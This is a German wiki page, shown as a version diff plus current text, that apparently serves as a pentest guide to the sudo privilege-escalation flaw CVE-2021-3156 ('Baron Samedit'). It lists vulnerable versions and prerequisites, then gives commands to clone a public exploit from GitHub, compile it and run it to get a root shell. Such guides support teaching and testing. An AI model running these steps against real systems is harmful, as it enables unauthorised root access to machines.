CVE-2021-3156: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „ ===Angriff: Root-Rechte durch Exploit=== ;Exploit herunterladen *git clone https://github.com/blasty/CVE-2021-3156.git *cd CVE-2021-3156 ;Exploit kompilieren…“) |
|||
| (Eine dazwischenliegende Version desselben Benutzers wird nicht angezeigt) | |||
| Zeile 1: | Zeile 1: | ||
| + | ==Privilege Escalation über sudo: CVE-2021-3156 ("Baron Samedit")== | ||
| + | ===Zielsetzung=== | ||
| + | *Root-Rechte durch eine Schwachstelle im sudo-Programm erlangen. | ||
| + | |||
| + | ===Wie entdeckt man die Schwachstelle?=== | ||
| + | ;sudo-Version prüfen | ||
| + | *sudo --version | ||
| + | |||
| + | ;Verwundbare Versionen | ||
| + | *Sudo <= 1.9.5p2 ist verwundbar. | ||
| + | |||
| + | ===Voraussetzungen=== | ||
| + | {| class="wikitable" | ||
| + | ! Bedingung !! Beschreibung | ||
| + | |- | ||
| + | | sudo-Version || <= 1.9.5p2 | ||
| + | |- | ||
| + | | Lokaler Benutzer || Zugriff auf sudo installiert | ||
| + | |- | ||
| + | | shell Zugriff || Vorhanden | ||
| + | |} | ||
===Angriff: Root-Rechte durch Exploit=== | ===Angriff: Root-Rechte durch Exploit=== | ||
;Exploit herunterladen | ;Exploit herunterladen | ||
| Zeile 13: | Zeile 34: | ||
;Erwartung | ;Erwartung | ||
*Root-Shell erhalten. | *Root-Shell erhalten. | ||
| + | ===Hinweise=== | ||
| + | *Exploit kann je nach libc-Version angepasst werden müssen. | ||
| + | *Bei Erfolg direkte Root-Rechte. | ||
Aktuelle Version vom 8. Mai 2026, 13:54 Uhr
Privilege Escalation über sudo: CVE-2021-3156 ("Baron Samedit")
Zielsetzung
- Root-Rechte durch eine Schwachstelle im sudo-Programm erlangen.
Wie entdeckt man die Schwachstelle?
- sudo-Version prüfen
- sudo --version
- Verwundbare Versionen
- Sudo <= 1.9.5p2 ist verwundbar.
Voraussetzungen
| Bedingung | Beschreibung |
|---|---|
| sudo-Version | <= 1.9.5p2 |
| Lokaler Benutzer | Zugriff auf sudo installiert |
| shell Zugriff | Vorhanden |
Angriff: Root-Rechte durch Exploit
- Exploit herunterladen
- git clone https://github.com/blasty/CVE-2021-3156.git
- cd CVE-2021-3156
- Exploit kompilieren
- gcc exploit.c -o sudo_exploit
- Exploit ausführen
- ./sudo_exploit
- Erwartung
- Root-Shell erhalten.
Hinweise
- Exploit kann je nach libc-Version angepasst werden müssen.
- Bei Erfolg direkte Root-Rechte.